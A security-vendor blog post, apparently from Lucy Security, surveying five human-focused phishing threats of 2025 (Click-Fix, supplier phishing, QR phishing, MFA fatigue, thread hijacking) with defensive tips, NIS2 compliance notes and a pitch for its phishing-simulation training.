Top 5 Human‑Factor Cybersecurity Threats of 2025: Phishing Evolves Again

Cybersecurity threats in 2025 have taken a new shape—targeting people, not just systems. Phishing-based attacks are more convincing, more personalized, and harder to detect. This post explores the top five human-factor cybersecurity threats this year, and how training and testing can help you stay ahead.

Cybersecurity threat

1. Click-Fix Attacks: A New Type Cybersecurity Threat

Click-Fix attacks are on the rise. These phishing attempts use fake pop-ups or system alerts, asking users to paste a “fix” into Terminal or Run. What looks like a helpful command actually launches malware.

Attackers are using these tactics in phishing emails, browser redirects, and chat support scams. Some campaigns have also been linked to nation-state actors.

Defend against it:

  • Simulate Click-Fix phishing in employee training. We have a new attack template to do this for you.

  • Warn staff not to copy-paste from unknown sources.

  • Monitor for clipboard activity linked to scripts.

2. Supplier Phishing: The Hidden Cybersecurity Threat in Your Inbox

Modern training programs use multiple types of content to reach employees effectively:

Supplier phishing is one of the most dangerous cybersecurity threats right now. Attackers hijack a trusted supplier’s email account and send malicious messages to internal staff. Because the email is real and the relationship is trusted, users are more likely to click.

In May 2025, a supplier phishing attack on the major UK retailer M&S caused major financial losses and exposed weaknesses in vendor controls.

Mitigation tips:

  • Include vendor-style phishing in awareness simulations.

  • Extend training to partners and outsourced teams. We can help you deliver this.

  • Verify requests through a second communication channel.

3. QR Code Phishing: Scan and Click to Get Hacked

QR codes are everywhere—from desks to meeting invites. But in 2025, phishing attacks using QR codes are increasing. These codes often lead to fake login pages or token-harvesting scripts.

Because the action starts on a smartphone, employees are less cautious. ENISA has flagged QR phishing as one of the top emerging cybersecurity threats in Europe.

Protect your people:

  • Use QR phishing in your awareness testing.
  • Teach staff to check URLs before logging in.
  • Post visual guidance in offices near shared spaces.

We have talked about QR codes in our Blog already and we have the attack and awareness templates to help you address this.

Cybersecurity threats 2025

4. MFA Fatigue: When Too Many Prompts Lead to One Wrong Click

Phishing attackers now exploit users through MFA fatigue. After stealing credentials, they trigger repeated login requests, hoping the user will approve one by mistake.

This tactic is especially common after work hours or on mobile devices. It was used in several high-profile attacks in 2024 and continues to grow.

What to do:

  • Train users on how MFA bombing works.

  • Simulate these attacks in your phishing tests.

  • Upgrade to phishing-resistant MFA where possible.

5. Email Thread Hijacking: Trusted Conversations Turned Risky

In a thread hijack, the attacker uses a real compromised account to reply to an active email conversation. It’s highly effective—because the message includes genuine email history and tone.

These phishing attacks are often aimed at finance, legal, and HR teams. They bypass filters and psychological defenses.

Defensive steps:

  • Include thread hijacking scenarios in simulations.

  • Train users to spot unusual attachments—even in trusted threads.

  • Encourage quick internal reporting for suspicious replies.

Cybersecurity Threats and Compliance: Why Training Is Now a Legal Priority

The European NIS2 Directive makes it clear: cybersecurity awareness is no longer optional. If your organization is in critical or important sectors, NIS2 requires:

  • Regular employee training

  • Simulated attacks to test response

  • Reporting and response workflows

Fines for non-compliance can reach up to €10 million or 2% of global turnover.

Organizations in Germany, Austria, and other EU countries must now prove they are taking human risk seriously. Implementing realistic phishing training and testing—as offered by platforms like Lucy—is a key part of meeting these obligations.

Final Thoughts: Cybersecurity Threats will continue to evolve so Train, Test, and Stay Ahead

The biggest cybersecurity threats of 2025 are not zero-day exploits—they’re clever, human-focused phishing techniques. And they’re working.

That’s why your defense plan should include:

  • Realistic phishing simulations based on current threats

  • Role-based awareness training, tailored by department

  • Continuous testing, especially for third-party risk

Tools like Lucy Security let you run targeted phishing tests, customize content, and track improvement over time.

It’s no longer just about catching the phish. It’s about proving you can.

Contact us if you want to discuss these challenges and your needs further.

Our YouTube channel also provides many helpful videos on these topics including how to clone attacks.